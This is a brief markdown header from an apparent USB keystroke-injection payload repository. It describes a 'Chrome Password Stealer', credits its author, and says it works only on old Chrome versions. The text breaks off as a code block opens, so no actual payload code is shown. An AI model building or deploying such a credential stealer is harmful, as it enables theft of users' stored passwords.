abhinavvv03/Rubber-Duckey/Payload---Chrome-Password-Stealer.md

 Steals Chrome passwords in the blink of an eye.
 Credits: This payload was created by nuk3leus (https://github.com/Nuk3leus/Ducky-chrome-password-stealer)

+EDIT: Google Chrome Version 36.0.1985.143 and below: Any version above is patched and requires user password.

 ```
 REM Author: Nuk3leus